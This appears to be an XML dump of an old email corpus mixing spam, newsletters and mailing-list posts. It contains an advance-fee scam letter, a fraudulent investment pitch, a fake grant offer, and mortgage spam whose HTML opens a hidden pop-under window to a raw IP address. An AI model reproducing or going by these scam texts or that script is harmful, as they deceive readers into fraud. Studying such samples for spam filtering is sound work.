    <t xml:space="preserve">Easy 30-50% Return?
 Learn how you can receive a monthly check for 3, 4, or 5%
 a month until your initial investment is paid off...then a
 monthly check for over 4% a month for years to come...
 We know it sounds impossible, but it's happening today.
 For complete information on this 
 multi-trillion dollar industry:
 http://market.pakoa.com/cl6
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 To Opt Out:
 Please go to our ""opt-out"" WEBSITE:
 http://www243.wiildaccess.com/optout.html
  [JK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lowest Mortgage Rates Around
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_943_7386722343340587207363271782623
 Content-Type: text/plain;
 	charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 We will help you get the mortgage loan you want! 
 Only takes 2 minutes to fill out our form. 
 http://202.105.49.100/index.php
 Whether a new home loan is what you seek or to refinance your current home =
 loan
 at a lower interest rate and payment, we can help!
 Mortgage rates haven't been this low in the last 12 months, take action now!
 Refinance your home with us and include all of those pesky credit card bills =
 or
 use the extra cash for that pool you've always wanted... 
 Where others says NO, we say YES!!!
 Even if you have been turned down elsewhere, we can help! 
 Easy terms! Our mortgage referral service combines the
 highest quality loans with most economical rates and the easiest =
 qualification!
 Click Here to fill out our form. 
 http://202.105.49.100/index.php
 ------=_NextPart_943_7386722343340587207363271782623
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Mortgage companies make you wait&lt;/TITLE&gt;
 &lt;META content=3D"MSHTML 5.50.4522.1800" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;script&gt;
 win=3Dwindow.open("http://211.154.135.98/user0204/index.asp?Afft=3DM12")
 win.blur()
 window.focus()
 &lt;/script&gt;
 &lt;/head&gt;
 &lt;BODY bgProperties=3Dfixed leftMargin=3D10 topMargin=3D10 marginwidth=3D"0" =
 marginheight=3D"0" NOSEND=3D"1"&gt;
 &lt;BLOCKQUOTE dir=3Dltr style=3D"PADDING-LEFT: 0px; MARGIN-LEFT: 5px; BORDER-LEFT: =
 #0000af 5px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV align=3Dcenter&gt;
   &lt;CENTER&gt;
   &lt;TABLE width=3D540 height=3D1 cellSpacing=3D1 border=3D0&gt;
     &lt;TBODY&gt;
     &lt;TR&gt;&lt;TD colspan=3D2&gt;
       &lt;P align=3Dcenter&gt;&lt;/FONT&gt;&lt;BIG&gt;&lt;STRONG&gt;&lt;FONT face=3DTahoma =
 color=3D#008000&gt;Mortgage companies make you wait...They Demand to Interview you..=
 They &lt;U&gt;Intimidate&lt;/U&gt; you...They &lt;U&gt;Humiliate&lt;/U&gt; you...And All of That is =
 While They Decide If They Even Want to Do Business With You...=
 &lt;/STRONG&gt;&lt;/BIG&gt;&lt;/P&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT color=3D#000000 size=3D5&gt;&lt;STRONG&gt;We Turn the Tables =
 on Them...&lt;BR&gt;Now, You're In Charge&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT color=3D#000000&gt;&lt;SMALL&gt;&lt;B&gt;Just Fill Out Our Simple =
 Form and They Will Have to Compete For Your Business...&lt;/B&gt;&lt;/SMALL&gt;&lt;BR&gt;&lt;BR&gt;&lt;A =
 href=3D"http://202.105.49.100/index.php" Target=3D"_NEW"&gt;&lt;BIG&gt;&lt;BIG&gt;&lt;STRONG&gt;CLICK =
 HERE FOR THE FORM&lt;/STRONG&gt;&lt;/BIG&gt;&lt;/BIG&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;BR&gt;
     &lt;/TD&gt;&lt;/TR&gt;
     &lt;TR&gt;
       &lt;TD vAlign=3Dcenter width=3D50%&gt;&lt;STRONG&gt;&lt;FONT size=3D2 face=3DTahoma =
 color=3D#000000&gt;We have hundreds of loan programs, including:&lt;/FONT&gt;&lt;/STRONG&gt;
           &lt;B&gt;&lt;FONT size=3D2 face=3DTahoma color=3D#008000&gt;
             &lt;UL&gt;
               &lt;LI&gt;Purchase Loans
               &lt;LI&gt;Refinance
               &lt;LI&gt;Debt Consolidation
               &lt;LI&gt;Home Improvement
               &lt;LI&gt;Second Mortgages
               &lt;LI&gt;No Income Verification
             &lt;/UL&gt;&lt;/FONT&gt;&lt;/B&gt;
        &lt;/TD&gt;
        &lt;TD width=3D50% valign=3Dtop&gt;
 		 &lt;BLOCKQUOTE dir=3Dltr style=3D"PADDING-LEFT: 25px; MARGIN-LEFT: 0px; =
 BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
 		 &lt;DIV align=3Dcenter&gt;&lt;CENTER&gt;&lt;P align=3Djustify&gt;You can save &lt;I&gt;&lt;B&gt;&lt;U&gt;Thousands =
 Of Dollars&lt;/U&gt;&lt;/B&gt;&lt;/I&gt; over the course of your loan with just a 1/4 of 1% Drop =
 in your rate!&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/DIV&gt;
        &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt;
 	  &lt;TD colspan=3D2&gt;
 	    &lt;BR&gt;&lt;P align=3Dcenter&gt;&lt;A href=3D"http://202.105.49.100/index.php" =
 Target=3D"_NEW"&gt;&lt;FONT face=3DTahoma color=3D#0000ff&gt;&lt;BIG&gt;&lt;BIG&gt;&lt;STRONG&gt;CLICK HERE FOR =
 THE FORM&lt;/STRONG&gt;&lt;/BIG&gt;&lt;/BIG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
         &lt;P align=3Dcenter&gt;&lt;FONT face=3DTahoma size=3D3 color=3D#000000&gt;&lt;STRONG&gt;You =
 will often be contacted with an offer the&lt;br&gt;very same day you fill out the =
 form!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
   &lt;/TABLE&gt;
  &lt;p&gt;
 &lt;hr WIDTH=3D"600"&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D10 WIDTH=3D"600" =
 BGCOLOR=3D"#FFFFCC" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&lt;font color=3D"#000000"&gt;This
 email was sent to you using Saf-E Mail Systems.&amp;nbsp; Your email address
 was automatically inserted into the To and From addresses to eliminate
 undeliverables which waste bandwidth and cause internet congestion. Your
 email or webserver &lt;b&gt;IS NOT &lt;/b&gt;being used for the sending of this mail.
 No-one else is receiving emails from your address. You may utilize the
 removal link below if you do not wish to receive this mailing. &lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;b&gt;Please &lt;a href=3D"http://202.105.49.100/remove.html"&gt;Remove Me&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-2&gt;Saf-E =
 Mail Systems, PO Box 116-3015 San Rafael de Heredia, CR&amp;nbsp; =
 011-506-267-7139&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;&lt;hr WIDTH=3D"600"&gt;&lt;/center&gt;
 &lt;/HTML&gt;
 ------=_NextPart_943_7386722343340587207363271782623--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Pango problems
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Matthias Saou wrote:
 &gt;Once upon a time, Julian wrote :
 &gt;
 &gt;  
 &gt;
 &gt;&gt;One of the things you need to understand with gnome2 is that while they
 &gt;&gt;did simplify a lot of things, most of the configuration options people
 &gt;&gt;found very useful are still available through gconf. Learn to love
 &gt;&gt;gconf-editor ;) -- metacity can have sloppy focus (Desktop Preferences
 &gt;&gt;-&gt; Window Focus -- there's actually GUI for that), and the delay until
 &gt;&gt;raising (and whether it raises) can be set in gconf-editor,
 &gt;&gt;/apps/metacity/general/auto_raise and auto_raise_delay
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Well, I stand corrected :-)
 &gt;The thing is, I hadn't used gconf-editor yet... and it's exactly what I
 &gt;feared, old "not so good" memories are coming back : It looks exactly like
 &gt;a GNOME RegEdit :-/ Oh well.
 &gt;I still hope that the few missing features I'm still looking for will be
 &gt;added in the next 2.0.x releases, like for example being able to have the
 &gt;panel always under *all* other windows (if you know how to do that, I'm
 &gt;really interested! ;-)).
 &gt;  
 &gt;
 More like Apple's implementation - the Gconf2 files are bog-standard 
 XML, should you feel tempted to edit it by hand :)
 There are some possibilities that using standardised configuration tools 
 provide: the ability to centrally manage a large number of computers - 
 something like Windows' group policy. Although that would require other 
 applications to use GConf as well .
 Haven't installed Limbo beta2 myself - been sidetracked by work; the 
 fact that the computer I'm installing it on is connected to a dodgy USB 
 ADSL modem that requires heavy kernel patching means that I would have 
 to do it over a weekend - but I don't think Red Hat currently does it 
 for its config tools.
 Regards,
 Michel
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Chris Haun wrote:
 &gt; A LifeGem is a certified, high quality diamond created from the carbon of 
 &gt; your loved one as a memorial to their unique and wonderful life.
 Why wait until you're dead? I'm sure there's enough carbon in
 the fat from your typical liposuction job to make a decent diamond.
 - Joe
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: GAMESPOT PC: Lionheart designer diary, No One Lives Forever 2 screenshot update, and more!
</t>
  </si>
  <si>
    <t xml:space="preserve">Reflexive Entertainment's Ion Hardie gives us a behind-the-scenes
 look at the development of this high-fantasy RPG.
 http://clickthru.online.com/Click?q=96-pjnWQtdhIRjzDLPjBQ-faEea09RR 
 Knights of the Old Republic Delayed
 Anarchy Online booster packs revealed, Stronghold: Crusader demo
 released, Cultures 2 ships, Funcom gets new CEO, and MORE PC NEWS.
 http://clickthru.online.com/Click?q=ab-ZcXKQYpMiyC0fCnXDRF5JtAnssRR 
 Gamer Anthopology 101
 This week our editors discuss the language of gamers, bad voice
 acting, and more.
 http://clickthru.online.com/Click?q=c0-kfy-QWP1dMP-ckw4_3rvnmcUHsRR 
 &lt;---------------Advertisement---------------&gt;
 Gateway Back to School Deals 
 The Gateway 400 Notebook makes Intel(R) Pentium(R) 4 
 power both portable and affordable. With its available 
 15" display and 2.0GHz processor, the Gateway 400 makes
 an excellent system for students and teachers.  Only $1399
 after $100 mail-in rebate.  click here for details!
 http://clickthru.online.com/Click?q=d6-yw3KQMPMLamOaNrnsqldgamSV9RR 
 &lt;-------------------------------------------&gt;
 Sign up for GameCreds Today! 
 Get access to hot new special offers on games like Neverwinter
 Nights and more.
 http://clickthru.online.com/Click?q=eb-HlLoQkDTMUDklrede0fdic3J99RR 
 Play Battlefield 1942 for Free!
 Explore the gritty trenches of World War II in this wild land,
 air, and sea shooter for free.
 http://clickthru.online.com/Click?q=00-4FXlI9QDZj_cENcbwnc-uevPYsRR 
 *****************************************************
 PS: The e-mail address for your subscription is:
 ericliu@neto.net
 To ensure prompt service, please include this address, exactly as 
 it appears above, in any correspondence to us.
 You're receiving GameSpot PC Games Newsletter because you 
 subscribed to it. To unsubscribe, go to
 http://clickthru.online.com/Click?q=15-mYR_zDcPljv7KCt4VxtoEFjtqDwS 
 To switch to the weekly digest, go to
 http://clickthru.online.com/Click?q=2a-CNeWIrIWMzpvOQGai1XJQ_FXjdRR 
 Copyright 2002 CNET Networks, Inc. All rights reserved. Gamespot is a registered service mark of CNET Networks, Inc.
 **zd_gif**
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Monday July 15
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.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Software
     Ogg Vorbis goes gold
     Sounds good
         http://www.theregister.co.uk/content/4/26176.html
     Norwegian gov ditches contract with Microsoft
     'Unfortunate deal,' says minister
         http://www.theregister.co.uk/content/4/26172.html
     MS to use PEAP for home wireless security?
     It's tagged as a possible for a 'future XP client'
         http://www.theregister.co.uk/content/4/26170.html
 Enterprise Systems
     EMC And Accenture - The Switzerland of Storage
     Vendor independent consulting
         http://www.theregister.co.uk/content/53/26163.html
     IBM sell first Regatta-H iSeries monster server
     Customer wants four - didn't TJ Watson say something about that once?
         http://www.theregister.co.uk/content/53/26161.html
     Nanotechnology may be over-hyped 
     Small-minded nonsense
         http://www.theregister.co.uk/content/53/26150.html
 Personal Hardware
     Sharp Linux handheld in double bug alert
     Zoinks!
         http://www.theregister.co.uk/content/54/26168.html
 Internet
     RedHotAnt boss jailed for 5 years 
     Worldcom, Level 3 stung in ISP collapse
         http://www.theregister.co.uk/content/6/26175.html
     Three domain name scams
     Bogus renewals, bogus directories
         http://www.theregister.co.uk/content/6/26167.html
     KPNQwest heads for final shutdown
     Good bits sold, customers gone, goodnight then
         http://www.theregister.co.uk/content/6/26160.html
 Net Security
     Linux attacks on the rise?
     Anecdotage
         http://www.theregister.co.uk/content/55/26177.html
     Sharp Linux handheld in double bug alert
     Zoinks!
         http://www.theregister.co.uk/content/55/26168.html
     USA Today swats hack attack - but not entirely
     Er, you missed a bit...
         http://www.theregister.co.uk/content/55/26157.html
 Business
     EU recycling rules to hit PC makers 
     Rubbish
         http://www.theregister.co.uk/content/7/26173.html
     Fujitsu plans cuts, predicts two more years to recovery
     CFO paints gloomy picture
         http://www.theregister.co.uk/content/7/26159.html
     Dell ups Q2 forecasts
     Different planet, obviously...
         http://www.theregister.co.uk/content/7/26158.html
 Networks
     One in ten workers squeezed out at Juniper
     Financial results are healthier, though
         http://www.theregister.co.uk/content/5/26164.html
 Broadband
     UK broadband take-up doubles
     Ooooooooooh!
         http://www.theregister.co.uk/content/22/26171.html
     BTo in business broadband promo 
     Strings attached naturally
         http://www.theregister.co.uk/content/22/26169.html
 BOFH: Whole Shebang
     BOFH and the God of Workplace Harmony
     Episode 14 Sacrifices must be made
         http://www.theregister.co.uk/content/30/25955.html
 Site News
     Cash'n'Carrion down for stocktake
     Back on Monday, proceeded by fanfare of trumpets
         http://www.theregister.co.uk/content/31/26178.html
     Calling all Reg Hackerettes
     Vulture Central seeks guidance on sizeable problem
         http://www.theregister.co.uk/content/31/26174.html
     Get your Reg logos here
     Full set of gif images for your viewing pleasure
         http://www.theregister.co.uk/content/31/26166.html
     Last call for Star Wars console competition
     Closes Monday, so get your skates on
         http://www.theregister.co.uk/content/31/26162.html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</si>
  <si>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Subject: [ILUG] serial console question
</t>
  </si>
  <si>
    <t xml:space="preserve"> I've found a decrepit raq3 that I'm going to resurrect, as soon as I work
 out what's up with the console.
  I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like:
 S+#_+ű INET __+_: 
 S+#_+ű Ű__ M++ű _++ +_&lt;_++_.
 S+#_+ű #+__+ S+#_+ű #+ + __+_: 
 I+#+ _+#+_ _ +# _+ -- N+ _+#_+ű SSL
 /+__/_/++
 S++ű + P_+_SQL: FATAL: S+_#+S_+_P_+: () #+: A___ #+_#&lt;  +_
         I_ #+_ _++#_+_ #+_#&lt; _+ű  +#+ _+?
         I +, _++ _++  (/++/._.PGSQL.5583) # _+_&lt;.
 /+__//_++#_+_: #+ _#+ UNIX _+_#+ _+
  [616]
 S+#_+ű ++ S++ű + W S_+: 
  So it looks like some sort of setting mismatch. Various places on the web
 say that cobalts are setup with 115200 8n1 serial ports, but someone could
 have changed it on this particular box.
  Anyone care to guess what's up ?
 John
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE:More info/grant money
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
 Lizzy young (lizzy@hkg.net) on Thursday, August 2, 2001 at 08:13:36
 ---------------------------------------------------------------------------
 message: Here is the information you requested:
 If you are interested in learning how to get $10,000
 to over $500,000 in free money, for Business, Education, 
 or personal needs, Please visit our website at: 
 http://1chn.com/ch7/
 We strongly oppose the use of SPAM email and do not want anyone who does not
 wish to receive our mailings to receive them. As a result, we have retained
 the services of an independent 3rd party to administer our list management
 and remove list(www.removeyou.com). This is not SPAM. If you do not wish to
 receive further mailings, please click below and enter your
 email at the bottom of the page. You may then rest-assured that you will
 never receive another email from us again. http://www.removeyou.com  The
 21st Century Solution.
 I.D. # 030500
 Regards'
 P. K.  Marketing
 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PLEASE, ASSISST.
</t>
  </si>
  <si>
    <t xml:space="preserve">HELLO,
 I AM A CITIZEN OF ZAIRE, SON OF THE LATE FORMER
 PRESIDENT OF ZAIRE (PRESIDENT MOBUTU SESE SEKO)
 SINCE THE DEATH OF MY LATE FATHER SOME YEARS AGO I HAVE
 BEEN RESIDING IN SOUTH AFRICA ON TEMPORARY POLITICAL ASYLUM. ON MY ARRIVALIN SOUTH AFRICA AFTER MY LATE FATHER'S BURIAL, I CAME IN WITH A DIPLOMATIC
 PACKAGED CONSIGNMENT CONTAINING THE SUM OF $8,000,000.00 (EIGHT MILLION UNITED STATES DOLLARS) WHICH I GOT FROM PART OF THE MONEY MY LATE FATHER MADE THROUGH DIAMONDS SALES WHEN HE WAS THE PRESIDENT OF ZAIRE FOR ABOUT 32 YEARS.PRECISELY, SINCE MY ARRIVAL WITH THE DIPLOMATIC PACKAGED CONSIGNMENT IT HAS BEEN SAFELY KEPT WITH A SECURITY COMPANY HERE IN SOUTH AFRICA.
 I DO NOT WANT TO INVEST THIS MONEY IN ANY PART OF
 AFRICA DUE TO THE CONSTANT POLITICAL INSTABILITY IN
 AFRICA.MY PLAN IS TO USE THIS MONEY TO INVEST IN A
 PROFITABLE BUSINESS IN ANY PART OF THE WORLD APART
 FROM AFRICA, ALSO TO PURCHASE A RESIDENTIAL
 ACCOMMODATION. I WILL COME OVER AND SETTLE THERE
 WITH MY FAMILY. HENCE,I AM SOLICITING FOR YOUR
 ASSISTANCE AS MY FOREIGN PARTNER TO RECEIVE THIS
 MONEY ON MY BEHALF ON ARRIVAL ABROAD AND TO KEEP IT
 IN A SAFE PLACE PENDING MY ARRIVAL TO JOIN YOU UP.
 UPON THE RECEIPT OF YOUR ACCEPTANCE TO MY PROPOSAL, I CAN IMMEDIATELY ARRANGE FOR THE MONEY TO LEAVE NIGERIA IN YOUR FAVOUR (i.e. AS THE BENEFICIARY) FOR ONWARD
 MOVEMENT TO WHERE YOU CAN RECEIVE THE CONSIGNMENT.
 PLEASE IF YOU ARE WILLING TO ASSIST ME, DO SEND IN
 YOUR REPLY IMMEDIATELY BASED ON THE FOLLOWING: -
 1) THE PERCENTAGE OF THIS AMOUNT WHICH YOU INTEND
 TO CHARGE FOR YOUR ASSISTANCE, PLEASE FEEL FREE TO
 EXPRESS YOUR MIND,
 (2) INCLUDE YOUR PRIVATE TELEPHONE AND FAX NUMBERS
 TO ENHANCE THE CONFIDENTIALITY,WHICH THIS BUSINESS
 DEMANDS.
 I SHALL INFORM YOU ON THE NEXT LINE OF ACTION AS
 SOON AS I RECEIVE YOUR POSITIVE RESPONSE. 10% OF THE TOTAL MONEY WILL BE SET ASIDE FOR ANY EXTRA EXPENDITURE. I ASSURE YOU THAT THIS DEAL IS 100% RISK
 FREE AS LONG AS WE KEEP IT TO OURSELVES.
 YOUR URGENT RESPONSE THROUGH MY E-MAIL SHALL BE
 HIGHLY APPRECIATED.
 BEST REGARDS,
 TAMKO MOBUTU.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</si>
  <si>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Carcooning
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/12.html
 Date: 2002-09-12T23:03:40-08:00
 If you've been in Los Angeles for long enough to read this sentence, chances 
 are you've spent more time stuck in traffic than you would care to consider. 
 That annoying fact of Southern California life is only going to become more 
 annoying and more of a factor with time, which is the point of "Car Trek," 
 tonight's edition of "By the Year 2000" at 7:30 on KCET (Channel 28) [which] 
 also looks at the phenomena of "carcooning" in which...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Clark on Munchkins
</t>
  </si>
  <si>
    <t xml:space="preserve">With Mobile IP?  Ack! 8-O
 http://ana-www.lcs.mit.edu/anaweb/PDF/PR_whitepaper_v2.pdf
 MB
 -- 
 Mark Baker, CTO, Idokorro Mobile (formerly Planetfred)
 Ottawa, Ontario, CANADA.               distobj@acm.org
 http://www.markbaker.ca        http://www.idokorro.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Tech Specialist]  Handprint Singing
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020710.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020710.html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&lt;/style&gt;&lt;title&gt;20020710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07.10.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;WE NEED YOU TO BE AT GNOMEDEX!&lt;/b&gt; That's what your employer should be 
 telling you. Microsoft Pocket PC experts will be sharing tips on improving 
 workplace productivity with portable devices. Combined with Proxim's on 
 location wireless networking solutions, a Pocket PC can keep you and your 
 co-workers communicating no matter where you are in the building. Learn 
 how to bring Wi-FI and PDA technologies together for the ultimate in 
 portable computing. 
 &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Reader Jack Macdonald has some advice for you would-be bards in the audience: 
 &lt;p&gt;"You mention Karaoke being featured at Gnomedex and you 
 might want to point out to other Gnomies that they could 
 practice their Karaoke on my &lt;a 
 href="http://www.geocities.com/Broadway/Lobby/1009/"&gt;Red Hot 
 Karaoke Page&lt;/a&gt; site. There are the words and music for 
 more than 1100 songs available on the site and by 
 downloading the Yamanha Midiplug (a link is provided) they 
 can even change the key of the song to suit their voice 
 range as well as speed up or slow down the music to their 
 taste. In other words, to have the same experience as they 
 would have with professional Karaoke equipment but at no 
 extra cost! At this price (zero) a lot of gnomies going to 
 Gnomedex could be singing up a storm by being properly 
 prepared for your Karaoke."
 &lt;p&gt;Travel day on Wednesday as I head down to Ankeny, Iowa to 
 help out a former co-worker and avid Gnomie with some server 
 and networking stuff. The tough part is remembering 
 everything I'll need. It never fails, though. I always, 
 always, always forget something. I can make lists two weeks 
 in advance and I'll end up 30 miles down the road with a 
 handprint on my forehead when I come to the realization that 
 I left something important behind. What will it be this 
 time, I wonder? I'll let you know on Thursday.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&lt;b&gt;Forwarding to Internet Address Fails&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;EN-US;q181636"&gt;http://support.microsoft.com/default.aspx?scid=kb;EN-US;q181636&lt;/a&gt;
 &lt;p&gt;Client inquires about the possibility of forwarding all 
 internal and Internet email to his AOL mailbox when he's out 
 of the office, and I figure it's going to be a piece of 
 cake. He recently acquired a new phone through Verizon along 
 with web access and a tie into his AOL mailbox, which was 
 the driving force behind this request. What I found was that 
 Internet email proved to be easy using a simple forwarding 
 rule, but none of the internal Exchange email was being sent 
 out to the Internet upon receipt, even though it appeared to 
 be included in the rule. As it happens, this is due to a 
 default configuration option on the Exchange 5.5 server that 
 prevents automatic replies/forwards from being sent to the 
 Internet using the Exchange Internet Mail Service. A quick 
 configuration change and restart of IMS will put things 
 right.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Stop the Presses&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.wininformant.com/Articles/Index.cfm?ArticleID=25802"&gt;http://www.wininformant.com/Articles/Index.cfm?ArticleID=25802&lt;/a&gt;
 &lt;p&gt;... The CD presses, that is. Microsoft has given in to 
 the greater good and delayed Windows 2000 Service Pack 3 
 indefinitely. Sure, it's mildly disappointing, but I applaud 
 the move. Instead of trying to downplay the previously 
 identified problems with Microsoft Installer (MSI) 2.0, the 
 service pack will be put on ice until the issues are 
 straightened out. Here's a quote for you... Good job, 
 Microsoft.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q198845"&gt;Q198845 - WD2000: How to Return Only File Names Using FileSearch Property (Q198845)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q310436"&gt;Q310436 - Cannot Play a DVD in Windows XP (Q310436)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q321305"&gt;Q321305 - How to Log On to Windows XP If You Forget Your Password or Your Password Expires (Q321305)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q321146"&gt;Q321146 - Freddi Fish 2: The Case of the Haunted Schoolhouse Program Causes an Error Message in Windows XP (Q321146)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q321144"&gt;Q321144 - Visioneer One Touch 8100 Scanner Causes an Error Message in Windows XP (Q321144)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeStore. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;Windows XP System File Checker&lt;/b&gt;
 &lt;p&gt;Dean Truax mentioned the System File Checker as a 
 possible solution to my Windows Media Player problem under 
 Windows XP, and I did indeed run through it prior to 
 attempting an in-place upgrade, obviously with no 
 improvement. It's still worth a mention, however, in case 
 you're not familiar with what it's there for. As you're 
 probably aware, XP contains a file protection scheme that 
 will immediate replace any system files that are deleted or 
 altered in any way, ensuring that XP is kept in a stable 
 state. Sometimes this system can get a little out of whack, 
 and the SFC is meant to restore order. Note that any 
 hotfixes and other Microsoft-provided updates will be left 
 in place since they properly update the DLL Cache that is 
 used as the sanity check to determine if a system file has 
 been messed with. To access the SFC, simply launch a command 
 prompt and type "SFC" to display a list of options.
 &lt;!-- GnomeSTUFF --&gt;
